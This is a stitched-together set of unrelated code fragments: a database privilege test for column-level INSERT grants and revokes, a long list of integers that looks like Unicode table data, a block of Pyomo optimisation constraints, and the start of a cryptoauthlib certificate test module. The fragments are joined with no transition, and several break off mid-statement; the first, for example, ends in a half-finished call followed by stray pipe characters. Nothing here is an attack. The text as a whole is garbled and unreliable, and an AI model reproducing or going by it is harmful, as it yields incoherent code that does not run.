with And("I insert into not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_fail}) VALUES ({data_fail})",
settings=[("user","user0")], exitcode=exitcode, message=message)
with And("I insert into granted column"):
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")])
with Then("I check the insert functioned"):
input_equals_output = input_output_equality_check(node, insert_columns_pass, data_pass)
assert input_equals_output, error()
if revoke_columns is not None:
with When("I revoke insert privilege from columns"):
node.query(f"REVOKE INSERT({revoke_columns}) ON merge_tree FROM role0")
with And("I insert into revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")], exitcode=exitcode, | |
128381,
-1,
921391730,
11241,
-51474,
921338757,
128493,
-1,
921506790,
128495,
921763839,
920848413,
-1,
921777907,
921645917,
-1,
-51470,
921711866,
129308,
-1,
921769380,
1421,
-51468,
921732440,
8295,
-51467,
921922639,
128270,
-1,
921975812,
9957,
922171140,
917248280,
127872,
922288127,
922091644,
-1,
922302203,
922192781,
-1,
-51462,
922252107,
11187,
-1,
922308539,
11186,
922498814,
922252113,
-1,
-51459,
922454922,
11189,
-1,
922495446,
11191,
922695425,
922439616,
-1,
-51456,
922651530,
11188,
-1,
922692054,
11190,
922943487,
922626523,
-1,
-51453,
922841931,
11185,
-1,
922898363,
11184,
923088646,
922115408,
128141,
-1,
923026691,
128365,
923219721,
923016897,
-1,
-51448,
923149243,
127832,
-1,
923211943,
127833,
-1,
923153734,
129350,
923481926,
917187423,
-1,
923547430,
923417014,
-1,
-51443,
923506808,
127487,
-51442,
923571885,
127486,
-51441,
923637234,
127485,
-51440,
923701529,
127484,
-51439,
923766325,
127483,
-51438,
923830423,
127482,
-51437,
923894094,
127481,
-51436,
923957282,
127480,
-51435,
924020556,
127479,
-51434,
924085805,
127478,
-51433,
924149969,
127477,
-51432,
924213349,
127476,
-51431,
924277591,
127475,
-51430,
924341780,
127474,
-51429,
924404983,
127473,
-51428,
924469955,
127472,
-51427,
924535285,
127471,
-51426,
924598365,
127470,
-51425,
924662471,
127469,
-51424,
924727209,
127468,
-51423,
924791590,
127467,
-51422,
924855135,
127466,
-51421,
924919135,
127465,
-51420,
924982583,
127464,
-51419,
925046818,
127463,
-1,
925110033,
127462,
925316921,
923504181,
-1,
925382456,
925249796,
-1,
925447986,
925312353,
-1,
925513516,
925402171,
-1,
-51413,
925469669,
128402,
-1,
925510192,
128403,
925710127,
925462348,
-1,
-51410,
925647459,
11262,
-1,
925700509,
128401,
-51408,
925667332,
128404,
-51407,
925842403,
128405,
-1,
925901358,
11841,
926154751,
925368320,
-1,
926168886,
926044844,
-1,
-51403,
926112934,
983151,
-1,
926169427,
128968,
-51401,
926106707,
983152,
-1,
926293918,
128639,
-1,
925327911,
128158,
926562109,
925244727,
-1,
-51397,
926511420,
128665,
-51396,
926573937,
983112,
-1,
926625362,
129534,
926824256,
926517172,
-1,
-51393,
926774091,
11153,
-1,
926830523,
11152,
927020867,
926754145,
-1,
-51390,
926955938,
129511,
-1,
927012071,
127822,
-51388,
926974075,
128699,
-51387,
927160778,
127895,
-1,
927224555,
128524,
927414115,
923426917,
-1,
927479635,
927370040,
-1,
927545168,
927411446,
-1,
927610700,
927496840,
-1,
-51381,
927566166,
127588,
-1,
927622790,
127586,
-51379,
927569485,
127587,
-51378,
927749614,
127585,
-51377,
927807384,
127584,
-1,
927866232,
127589,
928120831,
927465472,
-1,
-51374,
928023139,
128907,
-1,
928083458,
128205,
928266073,
927421395,
-1,
928331607,
928197471,
-1,
-51370,
928280398,
127906,
-1,
928327132,
128478,
-51368,
928269676,
129315,
-1,
928449339,
129531,
928659292,
928219754,
-1,
-51365,
928617210,
11215,
-1,
928666420,
11213,
928855902,
928610683,
127801,
-1,
928810862,
127989,
-51361,
928813592,
128675,
-51360,
928933353,
128019,
-51359,
928981322,
128640,
-51358,
929045486,
129302,
-1,
929109683,
127840,
929314688,
927338257,
-1,
929380213,
929251421,
-1,
929445745,
929331628,
-1,
929511274,
929381299,
9995,
929628159,
929432964,
-1,
-51351,
929524230,
128406,
-1,
929576143,
128400,
929773421,
929453588,
-1,
-51348,
929703341,
127339,
-1,
929766723,
127338,
-51346,
929707258,
9994,
-51345,
929900679,
11827,
-51344,
929964590,
11828,
-1,
930027611,
129306,
930232180,
929388043,
-1,
-51341,
930186777,
128740,
-1,
930225734,
128643,
-1,
930176014,
127752,
930494330,
929307959,
-1,
930559865,
930432254,
-1,
-51336,
930503310,
127949,
-1,
930553414,
127950,
-1,
930489178,
129437,
930822012,
930424856,
128251,
-1,
930742538,
128280,
930953086,
930748691,
128007,
-1,
930873806,
128048,
-51329,
930906446,
128000,
-1,
931026452,
128015,
931215257,
929269911,
-1,
931280784,
931158871,
-1,
931346317,
931217733,
-1,
931411850,
931280649,
-1,
931477383,
931335953,
-1,
-51322,
931410227,
5880,
-1,
931470647,
5879,
-51320,
931423699,
5876,
-51319,
931612650,
5877,
-1,
931671507,
5878,
-51317,
931363464,
5874,
-51316,
931816531,
5875,
-1,
931875523,
5873,
932118527,
931289943,
-1,
-51313,
932005280,
127933,
-1,
932065397,
127939,
932263831,
931233526,
-1,
-51310,
932220973,
11251,
-51309,
932283972,
11256,
-51308,
932346319,
11255,
-51307,
932409155,
11253,
-51306,
932470573,
11252,
-1,
932518509,
11254,
-51304,
932198518,
127945,
-1,
932649757,
8381,
932853662,
931155191,
-1,
-51301,
932798565,
983226,
-51300,
932861460,
983221,
-51299,
932921437,
983231,
-1,
932981599,
983223,
-51297,
932804642,
983113,
-1,
933117509,
129423,
933312608,
917121887,
-1,
933378013,
933252343,
-1,
933443542,
933304564,
-1,
933509032,
933387095,
-1,
-51291,
933448258,
66837,
-51290,
933505887,
66835,
-51289,
933570224,
66821,
-1,
933629713,
66836,
933836718,
933443497,
-1,
933902252,
933771975,
-1,
-51285,
933833567,
66853,
-1,
933892865,
66854,
-51283,
933841474,
66827,
-1,
934030175,
66826,
934229937,
933795960,
-1,
-51280,
934165643,
66852,
-1,
934226783,
66851,
934426548,
934183246,
-1,
-51277,
934362251,
66846,
-1,
934423391,
66845,
934623159,
934377506,
-1,
-51274,
934558859,
66844,
-1,
934619999,
66843,
934819770,
934571852,
-1,
-51271,
934768904,
66842,
-1,
934816607,
66841,
935016381,
934759671,
-1,
-51268,
934956836,
66833,
-1,
935013215,
66832,
935212992,
934955715,
-1,
-51265,
935148683,
66855,
-1,
935209823,
66831,
935409602,
935144287,
66824,
-1,
935346269,
66823,
935540677,
935339359,
-1,
-51260,
935476363,
66822,
-1,
935537503,
66820,
935737288,
935468343,
-1,
-51257,
935672971,
66819,
-1,
935734111,
66818,
-51255,
935696045,
66850,
-51254,
935892538,
66849,
-51253,
935956077,
66848,
-51252,
936020119,
66847,
-51251,
936078930,
66840,
-51250,
936143436,
66839,
-51249,
936206437,
66838,
-51248,
936269776,
66834,
-51247,
936331842,
66830,
-51246,
936394845,
66829,
-51245,
936459403,
66828,
-51244,
936522677,
66825,
-51243,
936581422,
66817,
-1,
936644369,
66816,
936851420,
933374815,
-1,
936916955,
936780974,
-1,
-51239,
936871357,
128294,
-51238,
936930289,
128268,
-1,
936989453,
128161,
-1,
936864526,
128024,
-1,
936784678,
129501,
937310219,
933331278,
-1,
937375753,
937246287,
-1,
937441286,
937328881,
-1,
937506799,
937370975,
-1,
937572328,
937465976,
-1,
937637860,
937503583,
43797,
-1,
937569119,
43796,
-51227,
937592983,
43793,
-51226,
937713765,
43798,
-51225,
937771101,
43794,
-1,
937824103,
43795,
938082303,
937502613,
-1,
938096619,
937962335,
43789,
-1,
938027871,
43788,
-51220,
938051735,
43785,
-51219,
938172517,
43790,
-51218,
938229853,
43786,
-1,
938282855,
43787,
938489847,
937434803,
-1,
938555378,
938421087,
43813,
-1,
938486623,
43812,
938686452,
938479377,
43808,
-1,
938610449,
43811,
-51211,
938641559,
43809,
-51210,
938762341,
43814,
-1,
938819677,
43810,
939014143,
938416400,
-1,
939079674,
938945375,
43821,
-1,
939010911,
43820,
939210748,
939003665,
43816,
-1,
939134737,
43819,
-51203,
939165847,
43817,
-51202,
939286629,
43822,
-1,
939343965,
43818,
939589631,
938968973,
-1,
939603970,
939469663,
43781,
-1,
939535199,
43780,
-51197,
939559063,
43777,
-51196,
939679845,
43782,
-51195,
939737181,
43778,
-1,
939790183,
43779,
940048383,
937370121,
-1,
-51192,
939954389,
4958,
-1,
939997352,
4957,
-51190,
937334258,
983047,
-1,
940120098,
983096,
940324896,
937252372,
-1,
940390424,
940270002,
-1,
940455955,
940333607,
-1,
-51185,
940379337,
127999,
-51184,
940444703,
127998,
-51183,
940510083,
127997,
-51182,
940575434,
127996,
-1,
940640738,
127995,
940900351,
940384850,
-1,
-51179,
940806930,
129459,
-51178,
940863893,
129456,
-51177,
940909830,
129457,
-1,
940972194,
129458,
941228031,
940338552,
-1,
941242397,
941121300,
128453,
941359103,
941163471,
-1,
-51172,
941242509,
128454,
-1,
941303135,
128455,
941504543,
941189428,
128460,
-1,
941455394,
128461,
-1,
941434960,
128459,
941701170,
940268375,
-1,
941766701,
941630817,
-1,
941832236,
941711661,
-1,
941897767,
941785422,
-1,
941963302,
941846612,
983048,
-1,
941883643,
983095,
-1,
941896457,
983046,
-51160,
941849014,
983134,
-51159,
942107998,
983178,
-51158,
942168046,
983099,
-51157,
942232448,
983064,
-1,
942291569,
983177,
-1,
941790183,
128282,
942553136,
941723328,
-1,
-51153,
942494569,
128388,
-1,
942549688,
128233,
942800895,
942501421,
983051,
-1,
942705298,
983050,
942880831,
941659634,
-1,
942946366,
942835218,
-1,
943011901,
942878418,
-1,
943077432,
942969525,
-1,
-51145,
943029922,
128915,
-1,
943071278,
128905,
943274043,
943028258,
-1,
-51142,
943212939,
128954,
-1,
943264451,
128942,
-51140,
943209047,
128935,
-1,
943404318,
128948,
-1,
942937870,
128125,
-1,
942894395,
128529,
943732810,
942804753,
-1,
943798345,
943681356,
128066,
943863878,
943751968,
-1,
943929413,
943787793,
-1,
-51132,
943881221,
127759,
-1,
943937742,
127758,
-1,
943862293,
127757,
944242687,
943784724,
-1,
-51128,
944141093,
127806,
-1,
944199372,
127805,
-1,
943733225,
129413,
944453709,
943691593,
128065,
-51124,
944404514,
128064,
-1,
944454113,
128083,
944650321,
944404514,
-1,
944715856,
944577847,
983104,
-1,
944641197,
983103,
-1,
944639761,
983135,
944912469,
944595045,
-1,
-51117,
944865614,
983049,
-51116,
944920084,
983100,
-1,
944983287,
983067,
945174616,
944868704,
-1,
-51113,
945122500,
127972,
-1,
945167961,
127984,
945371227,
945124846,
-1,
-51110,
945326137,
11249,
-1,
945382148,
11248,
-51108,
945327862,
127794,
-51107,
945516162,
11257,
-51106,
945580299,
983179,
-51105,
945633513,
129370,
-1,
945686615,
128231,
945895657,
933249117,
-1,
945961179,
945838935,
-1,
946026692,
945890655,
983129,
946092227,
945963101,
-1,
946157762,
946019658,
-1,
946223289,
946102260,
-1,
946288759,
946176334,
-1,
946354286,
946245913,
-1,
946419820,
946298981,
126066,
946536447,
946339840,
-1,
-51093,
946439060,
126093,
-1,
946487312,
126084,
946733055,
946352099,
126075,
-1,
946603209,
126102,
946813045,
946289351,
-1,
946878579,
946762178,
126067,
946995199,
946798592,
-1,
-51086,
946897812,
126094,
-1,
946946064,
126085,
947191807,
946816993,
126076,
-1,
947061961,
126103,
947322879,
946745070,
126074,
-1,
947193033,
126101,
947402884,
946239522,
-1,
947468414,
947341693,
126070,
947533947,
947423355,
126079,
-1,
947455177,
126106,
947716095,
947453952,
-1,
-51075,
947618708,
126097,
-1,
947666960,
126088,
947912703,
947401270,
126071,
947927169,
947816571,
126080,
-1,
947848393,
126107,
948109311,
947847168,
-1,
-51069,
948011924,
126098,
-1,
948060176,
126089,
948254867,
947335974,
-1,
948320396,
948199525,
-1,
948385930,
948276448,
126068,
948502527,
948305920,
-1,
-51063,
948405140,
126095,
-1,
948453392,
126086,
948699135,
948336611,
126077,
-1,
948569289,
126104,
948830207,
948256861,
-1,
948844689,
948735597,
126069,
948961279,
948764672,
-1,
-51056,
948863892,
126096,
-1,
948912144,
126087,
949157887,
948778900,
126078,
-1,
949028041,
126105,
949237920,
948202801,
-1,
949303447,
949190990,
-1,
-51050,
949261526,
126116,
-1,
+ m.b24 - m.b25 <= 0)
m.c377 = Constraint(expr= - m.b1 + m.b4 - m.b26 <= 0)
m.c378 = Constraint(expr= - m.b1 + m.b6 - m.b27 <= 0)
m.c379 = Constraint(expr= - m.b1 + m.b8 - m.b28 <= 0)
m.c380 = Constraint(expr= - m.b1 + m.b10 - m.b29 <= 0)
m.c381 = Constraint(expr= - m.b1 + m.b12 - m.b30 <= 0)
m.c382 = Constraint(expr= - m.b1 + m.b14 - m.b31 <= 0)
m.c383 = Constraint(expr= - m.b1 + m.b16 - m.b32 <= 0)
m.c384 = Constraint(expr= - m.b1 + m.b18 - m.b33 <= 0)
m.c385 = Constraint(expr= - m.b1 + m.b20 - m.b34 <= 0)
m.c386 = Constraint(expr= - m.b1 + m.b22 - m.b35 <= 0)
m.c387 = Constraint(expr= - m.b1 + m.b24 - m.b36 <= 0)
m.c388 = Constraint(expr= - m.b4 + m.b6 - m.b37 <= 0)
m.c389 = Constraint(expr= - m.b4 + m.b8 - m.b38 <= 0)
m.c390 = Constraint(expr= - m.b4 + m.b10 - m.b39 <= 0)
m.c391 = Constraint(expr= - m.b4 + m.b12 - m.b40 <= 0)
m.c392 = Constraint(expr= - m.b4 + m.b14 - m.b41 <= 0)
m.c393 = Constraint(expr= - m.b4 + m.b16 - m.b42 <= 0)
m.c394 = Constraint(expr= - m.b4 + m.b18 - m.b43 <= 0)
m.c395 = Constraint(expr= - m.b4 + m.b20 - m.b44 <= 0)
m.c396 = Constraint(expr= - m.b4 + m.b22 - m.b45 <= 0)
m.c397 = Constraint(expr= - m.b4 + m.b24 - m.b46 <= 0)
m.c398 = Constraint(expr= - m.b6 + m.b8 - m.b47 <= 0)
m.c399 = Constraint(expr= - m.b6 + m.b10 - m.b48 <= 0)
m.c400 = Constraint(expr= - m.b6 + m.b12 - m.b49 <= 0)
m.c401 = Constraint(expr= - m.b6 + m.b14 - m.b50 <= 0)
m.c402 = Constraint(expr= - m.b6 + m.b16 - m.b51 <= 0)
m.c403 = Constraint(expr= - m.b6 + m.b18 - m.b52 <= 0)
m.c404 = Constraint(expr= - m.b6 + m.b20 - m.b53 <= 0)
m.c405 = Constraint(expr= - m.b6 + m.b22 - m.b54 <= 0)
m.c406 = Constraint(expr= - m.b6 + m.b24 - m.b55 <= 0)
m.c407 = Constraint(expr= - m.b8 + m.b10 - m.b56 <= 0)
m.c408 = Constraint(expr= - m.b8 + m.b12 - m.b57 <= 0)
m.c409 = Constraint(expr= - m.b8 + m.b14 - m.b58 <= 0)
m.c410 = Constraint(expr= - m.b8 + m.b16 - m.b59 <= 0)
m.c411 = Constraint(expr= - m.b8 + m.b18 - m.b60 <= 0)
m.c412 = Constraint(expr= - m.b8 + m.b20 - m.b61 <= 0)
m.c413 = Constraint(expr= - m.b8 + m.b22 - m.b62 <= 0)
m.c414 = Constraint(expr= - m.b8 + m.b24 - m.b63 <= 0)
m.c415 = Constraint(expr= - m.b10 + m.b12 - m.b64 <= 0)
m.c416 = Constraint(expr= - m.b10 + m.b14 - m.b65 <= 0)
m.c417 = Constraint(expr= - m.b10 + m.b16 - m.b66 <= 0)
m.c418 = Constraint(expr= - m.b10 + m.b18 - m.b67 <= 0)
m.c419 = Constraint(expr= - m.b10 + m.b20 - m.b68 <= 0)
m.c420 = Constraint(expr= - m.b10 + m.b22 - m.b69 <= 0)
m.c421 = Constraint(expr= - m.b10 + m.b24 - m.b70 <= 0)
m.c422 = Constraint(expr= - m.b12 + m.b14 - m.b71 <= 0)
m.c423 = Constraint(expr= - m.b12 + m.b16 - m.b72 <= 0)
m.c424 = Constraint(expr= - m.b12 + m.b18 - m.b73 <= 0)
m.c425 = Constraint(expr= - m.b12 + m.b20 - m.b74 <= 0)
m.c426 = Constraint(expr= - m.b12 + m.b22 - m.b75 <= 0)
m.c427 = Constraint(expr= - m.b12 + m.b24 - m.b76 <= 0)
m.c428 = Constraint(expr= - m.b14 + m.b16 - m.b77 <= 0)
m.c429 = Constraint(expr= - m.b14 + m.b18 - m.b78 <= 0)
m.c430 = Constraint(expr= - m.b14 + m.b20 - m.b79 <= 0)
m.c431 = Constraint(expr= - m.b14 + m.b22 - m.b80 <= 0)
m.c432 = Constraint(expr= - m.b14 + m.b24 - m.b81 <= 0)
m.c433 = Constraint(expr= - m.b16 + m.b18 - m.b82 <= 0)
m.c434 = Constraint(expr= - m.b16 + m.b20 - m.b83 <= 0)
m.c435 = Constraint(expr= - m.b16 + m.b22 - m.b84 <= 0)
m.c436 = Constraint(expr= - m.b16 + m.b24 - m.b85 <= 0)
m.c437 = Constraint(expr= - m.b18 + m.b20 - m.b86 <= 0)
m.c438 = Constraint(expr= - m.b18 + m.b22 - m.b87 <= 0)
m.c439 = Constraint(expr= - m.b18 + m.b24 - m.b88 <= 0)
m.c440 = Constraint(expr= - m.b20 + m.b22 - m.b89 <= 0)
m.c441 = Constraint(expr= - m.b20 + m.b24 - m.b90 <= 0)
m.c442 = Constraint(expr= - m.b22 + m.b24 - m.b91 <= 0)
m.c443 = Constraint(expr= - m.b2 + m.b5 - m.b26 <= 0)
m.c444 = Constraint(expr= - m.b2 + m.b7 - m.b27 <= 0)
m.c445 = Constraint(expr= - m.b2 + m.b9 - m.b28 <= 0)
m.c446 = Constraint(expr= - m.b2 + m.b11 - m.b29 <= 0)
m.c447 = Constraint(expr= - m.b2 + m.b13 - m.b30 <= 0)
m.c448 = Constraint(expr= - m.b2 + m.b15 - m.b31 <= 0)
m.c449 = Constraint(expr= - m.b2 + m.b17 - m.b32 <= 0)
m.c450 = Constraint(expr= - m.b2 + m.b19 - m.b33 <= 0)
m.c451 = Constraint(expr= - m.b2 + m.b21 - m.b34 <= 0)
m.c452 = Constraint(expr= - m.b2 + m.b23 - m.b35 <= 0)
m.c453 = Constraint(expr= - m.b2 + m.b25 - m.b36 <= 0)
m.c454 = Constraint(expr= - m.b5 + m.b7 - m.b37 <= 0)
m.c455 = Constraint(expr= - m.b5 + m.b9 - m.b38 <= 0)
m.c456 = Constraint(expr= - m.b5 + m.b11 - m.b39 <= 0)
m.c457 = Constraint(expr= - m.b5 + m.b13 - m.b40 <= 0)
m.c458 = Constraint(expr= - m.b5 + m.b15 - m.b41 <= 0)
m.c459 = Constraint(expr= - m.b5 + m.b17 - m.b42 <= 0)
m.c460 = Constraint(expr= - m.b5 + m.b19 - m.b43 <= 0)
m.c461 = Constraint(expr= - m.b5 + m.b21 - m.b44 <= 0)
m.c462 = Constraint(expr= - m.b5 + m.b23 - m.b45 <= 0)
m.c463 = Constraint(expr= - m.b5 + m.b25 - m.b46 <= 0)
m.c464 = Constraint(expr= - m.b7 + m.b9 - m.b47 <= 0)
m.c465 = Constraint(expr= - m.b7 + m.b11 - m.b48 <= 0)
m.c466 = Constraint(expr= - m.b7 + m.b13 - m.b49 <= 0)
m.c467 = Constraint(expr= - m.b7 + m.b15 - m.b50 <= 0)
m.c468 = Constraint(expr= - m.b7 + m.b17 - m.b51 <= 0)
m.c469 = Constraint(expr= - m.b7 + m.b19 - m.b52 <= 0)
m.c470 = Constraint(expr= - m.b7 + m.b21 - m.b53 <= 0)
m.c471 = Constraint(expr= - m.b7 + m.b23 - m.b54 <= 0)
m.c472 = Constraint(expr= - m.b7 + m.b25 - m.b55 <= 0)
m.c473 = Constraint(expr= - m.b9 + m.b11 - m.b56 <= 0)
m.c474 = Constraint(expr= - m.b9 + m.b13 - m.b57 <= 0)
m.c475 = Constraint(expr= - m.b9 + m.b15 - m.b58 <= 0)
m.c476 = Constraint(expr= - m.b9 + m.b17 - m.b59 <= 0)
m.c477 = Constraint(expr= - m.b9 + m.b19 - m.b60 <= 0)
m.c478 = Constraint(expr= - m.b9 + m.b21 - m.b61 <= 0)
m.c479 = Constraint(expr= - m.b9 + m.b23 - m.b62 <= 0)
m.c480 = Constraint(expr= - m.b9 + m.b25 - m.b63 <= 0)
m.c481 = Constraint(expr= - m.b11 + m.b13 - m.b64 <= 0)
m.c482 = Constraint(expr= - m.b11 + m.b15 - m.b65 <= 0)
m.c483 = Constraint(expr= - m.b11 + m.b17 - m.b66 <= 0)
m.c484 = Constraint(expr= - m.b11 + m.b19 - m.b67 <= 0)
m.c485 = Constraint(expr= - m.b11 + m.b21 - m.b68 <= 0)
m.c486 = Constraint(expr= - m.b11 + m.b23 - m.b69 <= 0)
m.c487 = Constraint(expr= - m.b11 + m.b25 - m.b70 <= 0)
m.c488 = Constraint(expr= - m.b13 + m.b15 - m.b71 <= 0)
m.c489 = Constraint(expr= - m.b13 + m.b17 - m.b72 <= 0)
m.c490 = Constraint(expr= - m.b13 + m.b19 - m.b73 <= 0)
m.c491 = Constraint(expr= - m.b13 + m.b21 - m.b74 <= 0)
m.c492 = Constraint(expr= - m.b13 + m.b23 - m.b75 <= 0)
m.c493 = Constraint(expr= - m.b13 + m.b25 - m.b76 <= 0)
m.c494 = Constraint(expr= - m.b15 + m.b17 - m.b77 <= 0)
m.c495 = Constraint(expr= - m.b15 + m.b19 - m.b78 <= 0)
m.c496 = Constraint(expr= - m.b15 + m.b21 - m.b79 <= 0)
m.c497 = Constraint(expr= - m.b15 + m.b23 - m.b80 <= 0)
m.c498 = Constraint(expr= - m.b15 + m.b25 - m.b81 <= 0)
m.c499 = Constraint(expr= - m.b17 + m.b19 - m.b82 <= 0)
m.c500 = Constraint(expr= - m.b17 + m.b21 - m.b83 <= 0)
m.c501 = Constraint(expr= - m.b17 + m.b23 - m.b84 <= 0)
m.c502 = Constraint(expr= - m.b17 + m.b25 - m.b85 <= 0)
m.c503 = Constraint(expr= - m.b19 + m.b21 - m.b86 <= 0)
m.c504 = Constraint(expr= - m.b19 + m.b23 - m.b87 <= 0)
import datetime
import base64
import binascii
import pytest
import pytz
from datetime import datetime
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from ctypes import sizeof, create_string_buffer, memmove, addressof, c_uint8, POINTER
from cryptoauthlib import *
from cryptoauthlib.library import load_cryptoauthlib, get_size_by_name
from cryptoauthlib_mock import atcab_mock
ATCACERT_DEF_DEVICE_VECTOR = bytearray.fromhex(
'00 00 00 00 02 00 00 0A 00 00 00 07 00 00 00 00'
'00 00 00 00 00 01 00 00 00 04 00 00 00 04 00 4F'
'01 00 02 00 00 00 00 01 00 00 40 00 02 00 00 00'
'0A 00 00 00 48 00 CF 00 40 00 5F 01 4B 00 65 00'
'0D 00 00 00 00 00 5D 00 04 00 0F 00 10 00 3F 01'
'14 00 1E 01 14 00 00 00 00 00 00 00 00 00 00 00'
'00 00 00 00 00 00 00 00 00')
ATCACERT_DEF_DEVICE_CONFIG = {
'type': atcacert_cert_type_t.CERTTYPE_X509,
'template_id': 2,
'chain_id': 0,
'private_key_slot': 0,
'sn_source': atcacert_cert_sn_src_t.SNSRC_PUB_KEY_HASH,
'cert_sn_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_NONE,
'slot': 0,
'is_genkey': 0,
'offset': 0,
'count': 0
},
'issue_date_format': atcacert_date_format_t.DATEFMT_RFC5280_UTC,
'expire_date_format': atcacert_date_format_t.DATEFMT_RFC5280_GEN,
'tbs_cert_loc': {'offset': 4, 'count': 335},
'expire_years': 0,
'public_key_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_DATA,
'slot': 0,
'is_genkey': 1,
'offset': 0,
'count': 64
},
'comp_cert_dev_loc': {
'zone': atcacert_device_zone_t.DEVZONE_DATA,
'slot': 10,
'is_genkey': 0,
'offset': 0,
'count': 72
},
'std_cert_elements' : [
{'offset': 207, 'count': 64},
{'offset': 351, 'count': 75},
{'offset': 101, 'count': 13},
{'offset': 0, 'count': 0},
{'offset': 93, 'count': 4},
{'offset': 15, 'count': 16},
{'offset': 319, 'count': 20},
{'offset': 286, 'count': 20},
]
}
ATCACERT_DEF_DEVICE_TEMPLATE_VECTOR = bytearray([
0x30, 0x82, 0x01, 0xa6, 0x30, 0x82, 0x01, 0x4b, 0xa0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x41,
0xa6, 0x8b, 0xe4, 0x36, 0xdd, 0xc3, 0xd8, 0x39, 0xfa, 0xbd, 0xd7, 0x27, 0xd9, 0x74, 0xe7, 0x30,
0x0a, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x04, 0x03, 0x02, 0x30, 0x34, 0x31, 0x14, 0x30,
0x12, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x0b, 0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20,
0x49, 0x6e, 0x63, 0x31, 0x1c, 0x30, 0x1a, 0x06, 0x03, 0x55, 0x04, 0x03, 0x0c, 0x13, 0x45, 0x78,
0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6e, 0x65, 0x72, 0x20, 0x46, 0x46, 0x46,
0x46, 0x30, 0x20, 0x17, 0x0d, 0x31, 0x37, 0x30, 0x37, 0x31, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30,
0x30, 0x5a, 0x18, 0x0f, 0x33, 0x30, 0x30, 0x30, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x35, 0x39,
0x35, 0x39, 0x5a, 0x30, 0x2f, 0x31, 0x14, 0x30, 0x12, 0x06, 0x03, 0x55, 0x04, 0x0a, 0x0c, 0x0b,
0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x49, 0x6e, 0x63, 0x31, 0x17, 0x30, 0x15, 0x06,
0x03, 0x55, 0x04, 0x03, 0x0c, 0x0e, 0x45, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x20, 0x44, 0x65,
0x76, 0x69, 0x63, 0x65, 0x30, 0x59, 0x30, 0x13, 0x06, 0x07, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x02,
0x01, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x03, 0x01, 0x07, 0x03, 0x42, 0x00, 0x04, 0x96,
0x27, 0xf1, 0x3e, 0x80, 0xac, 0xf9, 0xd4, 0x12, 0xce, 0x3b, 0x0d, 0x68, 0xf7, 0x4e, 0xb2, 0xc6,
0x07, 0x35, 0x00, 0xb7, 0x78, 0x5b, 0xac, 0xe6, 0x50, 0x30, 0x54, 0x77, 0x7f, 0xc8, 0x62, 0x21,
0xce, 0xf2, 0x5a, 0x9a, 0x9e, 0x86, 0x40, 0xc2, 0x29, 0xd6, 0x4a, 0x32, 0x1e, 0xb9, 0x4a, 0x1b,
0x1c, 0x94, 0xf5, 0x39, 0x88, 0xae, 0xfe, 0x49, 0xcc, 0xfd, 0xbf, 0x8a, 0x0d, 0x34, 0xb8, 0xa3,
0x42, 0x30, 0x40, 0x30, 0x1d, 0x06, 0x03, 0x55, 0x1d, 0x0e, 0x04, 0x16, 0x04, 0x14, 0x2d, 0xda,
0x6c, 0x36, 0xd5, 0xa5, 0x5a, 0xce, 0x97, 0x10, 0x3d, 0xbb, 0xaf, 0x9c, 0x66, 0x2a, 0xcd, 0x3e,
0xe6, 0xcf, 0x30, 0x1f, 0x06, 0x03, 0x55, 0x1d, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xc6,
0x70, 0xe0, 0x5e, 0x8a, 0x45, 0x0d, 0xb8, 0x2c, 0x00, 0x2a, 0x40, 0x06, 0x39, 0x4c, 0x19, 0x58,
0x04, 0x35, 0x76, 0x30, 0x0a, 0x06, 0x08, 0x2a, 0x86, 0x48, 0xce, 0x3d, 0x04, 0x03, 0x02, 0x03,
0x49, 0x00, 0x30, 0x46, 0x02, 0x21, 0x00, 0xe1, 0xfc, 0x00, 0x23, 0xc1, 0x3d, 0x01, 0x3f, 0x22,
0x31, 0x0b, 0xf0, 0xb8, 0xf4, 0xf4, 0x22, 0xfc, 0x95, 0x96, 0x33, 0x9c, 0xb9, 0x62, 0xb1, 0xfc,
0x8a, 0x2d, 0xa8, 0x5c, 0xee, 0x67, 0x72, 0x02, 0x21, 0x00, 0xa1, 0x0d, 0x47, 0xe4, 0xfd, 0x0d,
0x15, 0xd8, 0xde, 0xa1, 0xb5, 0x96, 0x28, 0x4e, 0x7a, 0x0b, 0xbe, 0xcc, 0xec, 0xe8, 0x8e, 0xcc,
0x7a, 0x31, 0xb3, 0x00, 0x8b, 0xc0, 0x2e, 0x4f, 0x99, 0xc5
])
def pretty_print_hex(a, l=16, indent=''):
"""
Format a list/bytes/bytearray object into a formatted ascii hex string
"""
s = ''
a = bytearray(a)
for x in range(0, len(a), l):
s += indent + ''.join(['%02X ' % y for y in a[x:x+l]]) + '\n'
return s
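# Illustrative example (not part of the original test module):
# pretty_print_hex(bytes([0, 1, 2, 3]), l=2, indent='  ') returns
# '  00 01 \n  02 03 \n', i.e. two bytes per row, each rendered with '%02X '.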
def pubnums_to_bytes(pub_nums):
return bytes(bytearray.fromhex('%064X%064X' % (pub_nums.x, pub_nums.y)))
def device_cert_sn(size, builder):
"""Cert serial number is the SHA256(Subject public key + Encoded dates)"""
# Get the public key as X and Y integers concatenated
pubkey = pubnums_to_bytes(builder._public_key.public_numbers())
# Get the encoded dates
expire_years = 0
enc_dates = bytearray(b'\x00'*3)
